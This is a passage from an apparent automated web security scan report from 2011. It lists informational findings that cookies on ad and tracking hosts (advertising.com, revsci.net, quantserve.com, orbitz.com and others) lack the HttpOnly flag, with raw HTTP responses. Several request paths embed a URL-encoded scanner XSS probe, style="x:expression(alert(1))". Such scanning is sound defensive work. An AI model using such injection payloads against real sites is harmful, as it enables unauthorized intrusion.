rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.398. http://pix04.revsci.net/F08747/b3/0/3/1003161/868788633.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/868788633.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeU+FbxIQlVNYvPseIeEiFPKEy2jX32SxfaDo4ZtI52+8kOrN2tIEatD2NFDN28McViXNICYwA3URtRQyHBfvW63RgQEvN3nTlHdbuK0MtbbnRIrYmtGmo+sIQgYnBbz1rWaD5nvETvudYWPW+YY+jVNKmPA7C4cNze3ubSyVoP/Mvzh8yqOn8T4PkKmtuqmmNSNlUcCb7AvmmX6HduXeNE8ekpJt5PJt9TPDSc5OwZKZV8wtbsuH4GB5KnTDVufMfq4A7GludS80QNWlXxhqHWE5bdrAEQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:17:11 GMT; Path=/
NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:17:11 GMT; Path=/
rtc_0=MLsvsNUvMS5jJgE8Efe6cA/gU+BBsKjEeIf8lOISRcnGovHI6UEjSeeH4ygDZPpq3+/yS+PtxMQT7DslgE+EiBMcIdm+Gd/vQ8HMUGpOgSK+Iiy2dQ4mJ3SoQqTJ6fQVFiTZ9oRHyAn8YGRiYSjj2Ay1aQ3fE6vV5I9utDq0gdZ4/kVrRmNIOysji0Wn6/0LxbFbkxJUqn7AWIp2smXVCwMrSCX++R6vBtN664sMTvtNTbZXz0uM3sNWkLQhYlIi7SQwWY0rkMmj7vgY8B8gTBxg4wiG6w5j1DmzvVr4tx5DmkYz2wgpi9jyFX3BxNhVvlXHFNzBu4s3pRGxzkoYSZsG7tdLNgzEqBJPubDyRn4Xf+c3859kMdk7ghrTmCS2c/r6TbGtxpUM45NaHIbEK6+Cm0jFU0ivCzVPvaGdh9z3gjy1aXP5qVqL4CpwQgO4GiR/u5Ro5/TlTA==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:17:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.399. http://pix04.revsci.net/F08747/b3/0/3/1003161/869604030.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/869604030.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3elPsVX+8er9duzVms/qpMm; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:26 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64ae&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:26 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3elPsVX+8er9duzVms/qpMm; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:26 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64ae&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:26 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:25 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.400. http://pix04.revsci.net/F08747/b3/0/3/1003161/887063996.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/887063996.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iDSaWM1VkT6a+g=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:24 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b4&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:24 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iDSaWM1VkT6a+g=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:24 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b4&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:24 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:24 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.401. http://pix04.revsci.net/F08747/b3/0/3/1003161/934643839.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/934643839.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl0ESyMI1VkQha9I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:18 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a6&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl0ESyMI1VkQha9I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:18 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a6&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:18 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:18 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.402. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dp_rec="{\"3\": 1296659629+ \"2\": 1296508071}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.403. http://pixel.mathtag.com/event/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ts=1296661418; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:43:38 GMT
uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:43:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.404. http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-78V15bIOxaPIs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EBEAG6ANq0itiBDbz6HJXbIAAb8BAfoFgfUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ; expires=Tue, 03-May-2011 15:17:19 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.405. http://price.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://price.orbitz.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: price.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=orbitz-price-assurance&cnt=OVI
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

12.406. http://px.admonkey.dapper.net/PixelMonkey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://px.admonkey.dapper.net
Path:	/PixelMonkey

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=2834773414177048; Domain=.admonkey.dapper.net; Expires=Sun, 31-Jul-2011 15:24:17 GMT
data="ithwWl725iCgwVjOuIjFffXzvlgq+X6ol6Rkb4q6KW1sKZfoc8RpQzn54SyBonVLWP8y2QbCakiOvkZRtiEot+PF1HSXsMAvEmDtuCxqR8CJQvK1LhiNdbh2zB9gT82KW9kCrUiSVbgw+Mv0/kx1z4+2GEbRoAHZCdpc0OQ1u+znKWk/yeG1zq5CP50PZyBUV5qObn2MgIbI3JBFD/Bh3d3oSd7xT5XRSGnd4gJA7zNT0beuJCawAf0J1rrwaH199/iK1mPRuVI!"; Version=1; Domain=.admonkey.dapper.net; Max-Age=15552000; Expires=Sun, 31-Jul-2011 15:24:17 GMT
last_modified=1296573857201; Domain=.admonkey.dapper.net; Expires=Sun, 31-Jul-2011 15:24:17 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.407. http://r.casalemedia.com/j.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.casalemedia.com
Path:	/j.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CMID=BECVgq3LtckAABg-QdMAAAAp;domain=casalemedia.com;path=/;expires=Thu, 02 Feb 2012 15:43:38 GMT
CMST=TUl7qk1Je6oB;domain=casalemedia.com;path=/;expires=Thu, 03 Feb 2011 15:43:38 GMT
CMSC=TUl7qg**;domain=casalemedia.com;path=/;
CMJ2=AAJzHU1Je6oB;domain=casalemedia.com;path=/;expires=Thu, 02 Feb 2012 15:43:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.408. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=8e1bb757-a622-431b-967f-869e18a071fe; expires=Fri, 01-Feb-2013 15:14:47 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=irXSNNbjHEEqG+pgigQvJVAcueJCWYoBwZGGGaAq; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:19 GMT; path=/
F1=BIueJ1E; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:19 GMT; path=/
ROLL=gqwLZPM!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:19 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
7376408871=_4d48254a,7376408871,747145^961923^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000747145/mnum=0000961923/cstr=25807272=_4d482560,1483511146,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=25807272&siteValue=0000747145&city=Dallas/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=krXSNNbjHEEqG+pgigQvJVAcueJCWYoBwZGGGaAq; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
F1=BQueJ1E; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
ROLL=gqwLZPM!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
1483511146=_4d482560,1483511146,747145^961923^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&ref=AOL&geo=true
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 02 Feb 2011 15:40:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 209
Date: Wed, 02 Feb 2011 15:40:20 GMT
Connection: close
Set-Cookie: C2=krXSNNbjHEEqG+pgigQvJVAcueJCWYoBwZGGGaAq; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
Set-Cookie: F1=BQueJ1E; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
Set-Cookie: ROLL=gqwLZPM!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
Set-Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 1483511146=_4d482560,1483511146,747145^961923^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&ref=AOL&geo=true">here</a>.</h2>
</body>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000749715/mnum=0000918410/bnum=29104868/cstr=29104868=_4d482547,0572256108,749715^918410^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AScb47c603bd494ad09cac82f8e21e47bc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=jiCSNNbjHEEqGfugigQvJVAc; domain=advertising.com; expires=Thu, 31-Jan-2013 15:37:07 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
0572256108=_4d482547,0572256108,749715^918410^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://www.merchantcircle.com/signup/partner?pid=aol&utm_source=sept2010&utm_medium=MCbanner&utm_content=728x90&utm_campaign=
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 01 Feb 2011 15:37:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 258
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:37:07 GMT
Connection: close
Set-Cookie: C2=jiCSNNbjHEEqGfugigQvJVAc; domain=advertising.com; expires=Thu, 31-Jan-2013 15:37:07 GMT; path=/
Set-Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 0572256108=_4d482547,0572256108,749715^918410^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.merchantcircle.com/signup/partner?pid=aol&utm_source=sept2010&utm_medium=MCbanner&utm_content=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000749715/mnum=0000964772/bnum=10533267/cstr=10533267=_4d48255e,5052657456,749715^964772^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=ASda8e1ea7652d4c0992c679c6d2b63588

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=riCSNNbjHEEqGfugigQvJVAcRujZvkgBoC; domain=advertising.com; expires=Thu, 31-Jan-2013 15:37:15 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
5052657456=_4d48255e,5052657456,749715^964772^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://www.taxact.com/10tax.asp?sc=104072450109&p=1002450109_160x600_btf_ON
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 01 Feb 2011 15:37:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 196
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:37:15 GMT
Connection: close
Set-Cookie: C2=riCSNNbjHEEqGfugigQvJVAcRujZvkgBoC; domain=advertising.com; expires=Thu, 31-Jan-2013 15:37:15 GMT; path=/
Set-Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 5052657456=_4d48255e,5052657456,749715^964772^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.taxact.com/10tax.asp?sc=104072450109&p=1002450109_160x600_btf_ON">here</a>.</h2>
</body></html>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=747145/size=300250/u=2/bnum=11479363/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=lrXSNJpwHg02Fq0BdbdhKdwUwXoSH8Y4Fq0BYTehKdQ3gZoSHQTnGq0BF2phKdAohXoSHYZ4Fq0BKGehKdwohXoSHca4Fq0BiGehKdQshXoSwOIAM/oRhI7YBwAoGj0r1NQcKasLGKmAI9YRoN53DkL3F+ygPTw6TV4UsuWB/0mBhca7FIaWG4frMaw41Z0CkqlB6bjBLq6bCwWZGj6r4fQsMagJwa3BW8oBm0I9HsfzFeysNeQQoaoSs2zB1xmRdC; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
F1=BUueJ1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
BASE=YnQI/8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAetICCpHmL!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
ROLL=v5Q2V0M/k7zqHkG!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
11479363=_4d497ae5,6123380717,747145^961923^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=747145/size=300250/u=2/bnum=25807272/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=mrXSNNbjHEEqG+J; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
F1=BYueJ1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
BASE=TPQQKfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BSIFyatzhE!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
ROLL=gqwLYPc8XjFCtxE!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
25807272=_4d497ae6,1141323065,747145^961923^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=749715/size=160600/u=2/bnum=10533267/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=eVCSNNbjHEEqGhO; domain=advertising.com; expires=Thu, 31-Jan-2013 15:23:10 GMT; path=/
F1=B4VJI1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 31-Jan-2013 15:23:10 GMT; path=/
